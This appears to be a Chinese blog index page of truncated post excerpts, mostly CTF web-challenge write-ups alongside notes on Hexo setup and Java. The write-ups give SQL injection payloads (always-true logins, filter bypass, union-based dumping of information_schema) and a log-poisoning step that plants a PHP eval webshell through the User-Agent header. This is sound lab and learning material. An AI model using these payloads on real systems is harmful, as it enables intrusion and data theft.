无题
1、[极客大挑2019]EasySQL1看到SQL就想到先尝试万能密码
1’ or 1=1#
解释:’是为了形成闭合语句,#为注释符(后面语句不再执行)
需要注意的是:
1.#可能会被URL自动进行编码导致语句错误
2.空格被过滤可以使用/**/绕过
解决:%23为#注释符的url编码
语句相当于:
select * from table_name where username='1' or 1=1 # ' and password='xxxxxx'
2.其实应该先简单判断是否存在注入点的 如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为
单引号个数不匹配
而报错。
3第三步、利用order by查表的列数payload:username=1' order by 3%23&password=123(NO,Wrong username password!!!)payload:username=1' order by 4%23&password=123( ...
ctf.show_web9
登录界面,想到了sql注入,试一下万能密码,不行
`猜测可能有其他页面
法一:
直接后台目录扫描,发现index.phps源代码文件
法二:
robots.txt中查看被隐藏不允许访问的页面
User-agent: *
Disallow: /index.phps
index.phps代码<?php
$flag="";
$password=$_POST['password'];
if(strlen($password)>10){
die("password error");
}
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result))& ...
ctfshow_web_萌新赛签到题
题目:<?php
if(isset($_GET['url'])){
system("curl https://".$_GET['url'].".ctf.show");
}else{
show_source(__FILE__);
}
?>
看得出关键处是==system()==中的内容,此处去了解下
PHP 命令执行漏洞
应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。
当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行漏洞,这就是命令执行漏洞。
PHP的命令执行漏洞学习 PHP的命令执行漏洞学习_笑花大王的博客-CSDN博客](https://blog.csdn.net/weixin_43818995/article/details/104164684)):(win与linux系统下管道符的功能)
[ctfweb命令执行](CTFs ...
ctfShow7_8
ctf.show_web7
点开题目中列表,没有发现有价值的信息
但是URL中出现了**?id=**字样,可能是sql注入
http://579975c2-c8b2-48a7-955a-efc4b38455a6.challenge.ctf.show/?id=1
简单判断有无注入点id=1' 单引号判断(可能因为单引号不匹配而报错)
/index.php?id=1’ #
不报错
尝试后发现==空格==被过滤使用==//==或==/**/==绕过过滤
爆显示位
?id=1%27//or//1=1//union//select/**/1,2,3#
爆表
?id=1//union//select//1,group_concat(table_name),3//from//information_schema.tables//where/**/table_schema=database()#
爆字段
?id=-1//union//select//1,group_concat(column_name),3//from//information_schema.column ...
sql注入点判断
简单判断是否存在SQL注入单引号判断$id参数左右有数字型(无)、单引号、双引号、括号等方式组成闭合;
最为经典的==单引号判断法:==在参数后面加上单引号’比如:
http://xxx/abc.php?id=1'
如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为
单引号个数不匹配
而报错。
万能语句:如果我们传入的 username 为 1’ or 1=1 #,随意输入 password,那么传入后端验证时,sql语句就是
*%23为#注释符的url编码*
select * from table_name where username='1' or 1=1 # ' and password='xxxxxx'
通常 Sql 注入漏洞分为 2 种类型:
数字型
字符型
数字型判断: 当输入的参 x 为整型时,通常 123.php 中 Sql 语句类型大致如下:
select * from <表名> where id = x
这种类型可以使用经典的 and 1=1 和 and ...
Hexo-blog搭建问题汇总
1.hexo d命令时提示输入账号和密码问题起源来自一次hexo d的命令部署失败(从blog搭建开始那天,只要选择远端部署,报错就没消停过)hexo d后一直报错,提示无法连接github,于是修改了ssh,重新配置了_config.yml中的deploy:repo: https://github.com/KanNiKanYun/KanNiKanYun.github.io但是依旧没能解决问题:无法部署远端
于是继续查询解决方案 https://blog.csdn.net/hhgggggg/article/details/77853665解决参考链接如上关键步骤:配置rope为repo: git@github.com:kannikanyun/kannikanyun.github.io.git
gitee图床失效后的新的选择方式具体参考配置
概括:使用github仓库作为图床
缺点:1.上传速度慢
2.需要一段时间后更换仓库,以免占用空间过大被检测
ctfShow-web-4-6
4.ctf.show_web4题目描述和web3是一样的,但是3的方法已经不行了,没有思路,看提示
/etc/passwd依旧可以访问
文件包含 日志注入
请求头中可以看出,服务器是nginx
nginx的log在
/var/log/nginx/access.log
/var/log/nginx/error.log
access.log允许打开
http://6339ac54-c058-4ed2-a21d-5fe884f66c63.challenge.ctf.show/?url=/var/log/nginx/access.log
在UA中添加<?php eval($_POST['hack']);?>
防止url编码
使用蚁剑成功连接
refer to CTF show WEB 1-4_yu22x的博客-CSDN博客_ctfshow web](https://blog.csdn.net/miuzzx/ ...
java继承与封装学习
一、继承抽象类/方法:abstract关键字修饰java关键字abstract(抽象)详解
简单理解下:abstract关键字修饰的类/方法,只能被 继承、覆写/覆写 后才能实例
上转型对象父类 名称 = new 子类()
equals和==的区别双等号比较的其实是地址值
在编译String s1=“song”的时候其实是jvm在常量池中创建了一个内容为”song”的地址值,然后让s1去指向”song”,而不是把”song”直接赋值给s1;
在编译String s2=“song”的时候常量池中已经有了”song”的地址值,所以让s2直接指向常量池中的”song”,这样s1和s2的地址值都是常量池中”song”的地址值,所以通过双等号的运算结果是true。
equals比较的是内容是否相同
然而在第二种情况下执行String s2=new String(“song”)的时候,要记住每new一次就会出现一个新的对象,所以这种情况是直接在堆内存中开辟了一块新的空间去储存”song”,所以此时s1和s2的地址值是不一样的,自然==的结果就为false。
二、private关键字父类被子类 ...
CtfhubDay1
CTF基础知识比赛形式正文CTF比赛一般分为线上赛和线下赛。通常来说,线上赛多为初赛, 线下赛多为决赛, 但是也不排除直接进行
线上选手通过主办方搭建的比赛平台在线注册,在线做题并提交flag,线上比赛多为解题模式,攻防模式较为少见。通常来说对于长时间未解出的题目,主办方会酌情给出提示(Hint)来帮助选手做题。
线下选手前往比赛所在地,现场接入比赛网络进行比赛,线下多为AWD模式,近年来随着比赛赛制的不断革新,线下赛也会出现多种模式混合进行,例如结合解题+AWD ,解题+RW 等等
题目类型正文在CTF中主要包含以下5个大类的题目,有些比赛会根据自己的侧重点单独添加某个分类,例如移动设备(Mobile), 电子取证(Forensics)等,近年来也会出来混合类型的题目,例如在Web中存在一个二进制程序,需要选手先利用Web的漏洞获取到二进制程序,之后通过逆向或是Pwn等方式获得最终flag
WebWeb类题目大部分情况下和网、Web、HTTP等相关技能有关。主要考察选手对于Web攻防的一些知识技巧。诸如SQL注入、XSS、代码执行、代码审计等等都是很常见的考点。一般情况下Web ...
PHP学习笔记2
第三章_ 流程控制